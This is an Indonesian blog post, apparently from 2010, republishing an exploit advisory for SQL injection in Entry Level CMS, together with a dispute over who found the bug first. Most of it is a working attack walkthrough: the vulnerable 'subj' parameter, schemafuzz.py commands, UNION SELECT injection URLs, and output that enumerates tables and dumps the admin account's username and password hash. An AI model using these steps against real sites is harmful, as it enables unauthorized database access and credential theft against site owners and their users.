SQL Injection Entry Level Content Management System (EL CMS) dengan schemafuzz.py Rahman Surya Praja Kamis, 20 Mei 2010 No Comment

Ini bug yang saya temukan dan di bajak ma orang yang bernama   "HaMaDa SCoOoRPioN"  


dah jelas-jelas itu isi database saya vman ..coba bandingkan!!
http://securityreason.com/exploitalert/7413  <-- Me (25.10.2009)
http://securityreason.com/securityalert/7161 <-- HaMaDa SCoOoRPioN (25.03.2010)

show off!!
http://inj3ct0r.com/exploits/12308
http://www.exploit-db.com/exploits/12667http://securityreason.com/exploitalert/7413


[+]Title        : SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py 

            --==[ Author ]==--
[+] Author    : [+] vir0e5 (NEWBIE) 
[+] Contact    : vir0e5[at]hackermail[dot]com
[+] Group    : TECON (The Eye COnference) Indonesia
[+] Site    : http://tecon-crew.org
********************************************

                     [Software Information ]
[+]SOftware      : Entry Level Content Management System (EL CMS)
[+]vendor        : http://www.entrylevelcms.com/
[+]Vulnerability : SQL Injection
********************************************

[ Vulnerable File ]
http://localhost/website/index.php?subj=4

                    [demo with schemafuzz.py]
|---------------------------------------------------------------
| rsauron[at]gmail[dot]com                               v5.0  
|   6/2008      schemafuzz.py                                  
|      -MySQL v5+ Information_schema Database Enumeration      
|      -MySQL v4+ Data Extractor                               
|      -MySQL v4+ Table & Column Fuzzer                        
| Usage: schemafuzz.py [options]                               
|                      -h help                    darkc0de.com 
|------------------------------------------------------------

C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol

|------------------------------------------------------------
| rsauron[at]gmail[dot]com                               v5.0  
|   6/2008      schemafuzz.py                                  
|      -MySQL v5+ Information_schema Database Enumeration     
|      -MySQL v4+ Data Extractor                               
|      -MySQL v4+ Table & Column Fuzzer                        
| Usage: schemafuzz.py [options]                               
|                      -h help                    darkc0de.com 
|------------------------------------------------------------

[+] URL:http://localhost/website/index.php?subj=6--
[+] Evasion Used: "+" "--"
[+] 03:36:40
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 0
[+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3
[-] Done!

C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --full

|------------------------------------------------------------
| rsauron[at]gmail[dot]com                               v5.0  
|   6/2008      schemafuzz.py                                  
|      -MySQL v5+ Information_schema Database Enumeration      
|      -MySQL v4+ Data Extractor                               
|      -MySQL v4+ Table & Column Fuzzer                       
| Usage: schemafuzz.py [options]                               
|                      -h help                    darkc0de.com 
|------------------------------------------------------------

[+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 05:33:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
    Database: vman
    User: root@localhost
    Version: 5.0.51a

[Database]: elcms_db
[Table: Columns]
[0]pages: id,subject_id,menu_name,position,visible,content
[1]subjects: id,menu_name,position,visible
[2]users: id,username,hashed_password

[-] [05:55:27]
[-] Total URL Requests 17
[-] Done


C:\Python26\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --dump -D elcms_db -T users -C id,username,hashed_password

|------------------------------------------------------------
| rsauron[at]gmail[dot]com                             v5.0  
|   6/2008      schemafuzz.py                                  
|      -MySQL v5+ Information_schema Database Enumeration      
|      -MySQL v4+ Data Extractor                               
|      -MySQL v4+ Table & Column Fuzzer                        
| Usage: schemafuzz.py [options]                               
|                      -h help                    darkc0de.com 
|------------------------------------------------------------

[+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 05:35:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
    Database: vman
    User: root@localhost
    Version: 5.0.51a
[+] Dumping data from database "vman" Table "users"
[+] Column(s) ['id', 'username', 'hashed_password']
[+] Number of Rows: 1

[0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b8f19f541d436c8:

[-] [05:35:15]
[-] Total URL Requests 3
[-] Done




If you not understand about it 
[Option/help this tools]
 schemafuzz.py -h

********************************************

by Jillur Rahman

Jillur Rahman is a Web designers. He enjoys to make blogger templates. He always try to make modern and 3D looking Templates. You can by his templates from Themeforest.

Follow him @ Twitter | Facebook | Google Plus

No Comment

Terima Kasih Sudah berkunjung!! Di Mohon Untuk Meninggalkan Komen, untuk mempererat silaturahmi.... ^_^